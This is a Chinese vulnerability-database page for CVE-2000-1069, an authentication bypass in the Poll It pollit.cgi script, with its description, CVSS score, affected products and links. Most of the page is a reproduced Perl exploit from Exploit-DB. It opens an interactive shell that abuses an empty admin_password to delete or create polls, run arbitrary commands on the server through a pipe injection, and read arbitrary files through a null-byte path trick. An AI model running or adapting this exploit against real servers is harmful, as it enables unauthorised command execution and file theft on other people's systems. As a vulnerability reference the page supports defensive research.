CVE-2000-1069
CVSS6.4
发布时间 :2000-12-11 00:00:00
修订时间 :2016-10-17 22:08:21
NMCOE    

[原文]pollit.cgi in Poll It 2.01 and earlier allows remote attackers to access administrative functions without knowing the real password by specifying the same value to the entered_password and admin_password parameters.


[CNNVD]Poll It pollit.cgi访问控制漏洞(CNNVD-200012-009)

        Poll It 2.01及其之前版本的pollit.cgi存在漏洞。远程攻击者可以通过将entered_password和admin_password参数的规格化为相同的值,在不知道真实密码的情况下访问管理员函数。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:cgi-world:poll_it_pro:1.6
cpe:/a:cgi-world:poll_it:2.0
cpe:/a:cgi-world:poll_it:2.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1069
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1069
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-009
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97236719315352&w=2
(UNKNOWN)  BUGTRAQ  20001023 Re: Poll It v2.0 cgi (again)
http://xforce.iss.net/static/5419.php
(VENDOR_ADVISORY)  XF  pollit-admin-password-var

- 漏洞信息

Poll It pollit.cgi访问控制漏洞
中危 未知
2000-12-11 00:00:00 2005-05-02 00:00:00
远程  
        Poll It 2.01及其之前版本的pollit.cgi存在漏洞。远程攻击者可以通过将entered_password和admin_password参数的规格化为相同的值,在不知道真实密码的情况下访问管理员函数。

- 公告与补丁

        

- 漏洞信息 (177)

Poll It CGI v2.0 exploit (EDBID:177)
cgi webapps
2000-11-15 Verified
0 keelis
N/A [点击下载]
#!/usr/bin/perl

######################################
#                                    #
#                                    #
#      Poll It CGI v2.0 exploit      #
#       keelis/havoc korp 2000       #
#                                    #
#    shouts to modjo, p, zen, kd,    #
#     ab, all the script kiddies.    #
#                                    #
#                                    #
#     keelis(at)hushmail(dot)com     #
#                                    #
#                                    #
######################################

use Socket;

($host, $cgi_loc) = @ARGV[0,1];

$ip=inet_aton($host);

print("\n\t+---   Poll It CGI v2.0 exploit  ---+");
print("\n\t+---    keelis/havoc korp 2000   ---+\n\n\n");

usage() if (!defined($host) || !defined($cgi_loc));

while(true)
{
	print "[poll\@$host] ";

	$stdin = \*STDIN;
	$cmdin = <$stdin>;

	chomp($cmdin);
	($cmd, $param) = split(/ /, $cmdin, 2);
	
	if ($cmd eq "d")
	{
		$request = "?load=admin&admin_password=&action=delete_poll";
		$success_msg = "current poll has been deleted\n\n";
		make_request();
	}

	if ($cmd eq "e")
	{
		$request = "?load=admin&admin_password=&action=expire_poll";
		$success_msg = "current poll has been expired\n\n";
		make_request();
	}

	if ($cmd eq "c")
	{
		if (!defined($param))
		{
			print "you need to specify a voting topic for the new poll\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";
		$success_msg = "created new poll with voting topic: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "a")
	{
		if (!defined($param))
		{
			print "you need to specify the text for the new voting option\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=$param";
		$success_msg = "voting option added to current poll: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "g")
	{
		if (!defined($param))
		{
			print "you need to specify the command to be run\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";
		$success_msg = "command has been run on remote server: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "r")
	{
		if (!defined($param))
		{
			print "you need to specify the file to be read\n\n";
			next;
		}

		$request = "?load=admin&data_dir=$param%00";
		$success_msg = "contents of \"$param\" follow:\n\n";
		make_request();
	}

	if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")
	{
		print "\n? \t\tshow this help screen\n";
		print "d \t\tdelete current poll\n";
		print "e \t\texpire current poll\n";
		print "c <param>\tcreate new poll using <param> as topic\n";
		print "a <param>\tadd <param> to voting options\n";
		print "r <param>\tread the file <param> in remote server\n";
		print "g <param>\trun <param> in the remote server\n";
		print "x \t\texit pollex.pl shell\n\n";
		next;
	}

	if ($cmd eq "x")
	{
		print "\n";
		last;
	}

	print "command not found. use \"?\" for help screen.\n\n";
}

sub make_request {
	$request=~s/ /+/g;
	$request=~s/\\/%5C/g;
	$request=~s/\//%2F/g;

	my @req=sendraw("GET $cgi_loc$request HTTP/1.1\r\nHost: $host\r\n\r\n");
	$reqanswer=join('', @req);

	($httpv, $httpcode) = split(/ /, $reqanswer);
	$httpcode = substr($httpcode, 0, 3);

	if ($httpcode eq "200") {
		print $success_msg if ($cmd ne "r");
	} else {
		if ($httpcode ne "404")
		{
			print "httpd returned an error code:\n\n";
			print $reqanswer,"\n";
		} else {
			die "unexpected httpd error code 404. aborting...\n\n"
		}
	}


	if ($cmd eq "r")
	{	$reqanswer=substr($reqanswer, index($reqanswer, "\r\n\r\n")+4);

		if (substr($reqanswer, 6, 15) eq "Template : File")
		{
			print "file \"$param\" not found or non-readable from cgi\n\n";
		} else {
			print $success_msg;
			print $reqanswer,"\n";
		}
	}

	next;
}

sub usage {
	print "Usage:  pollex.pl <host> <cgi_loc>\n\n";
	print "\thost   :\thost/ip where CGI resides\n";
	print "\tcgi_loc:\tpath to the CGI (non-SSI version needed)\n\n";
	exit(0);
}

sub sendraw {
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("socket problems... aborting.\n");

        if(connect(S,pack "SnA4x8",2,80,$ip)){
                select(S);
                $|=1;
                print $pstr;
                my @in=<S>; 
                select(STDOUT);
	        close(S); 
                return @in;
        } else {
		die("can\'t connect... aborting.\n");
	}
}

# milw0rm.com [2000-11-15]
		

- 漏洞信息

6985
Poll It pollit.cgi Administration Authentication Bypass
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-01-22 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站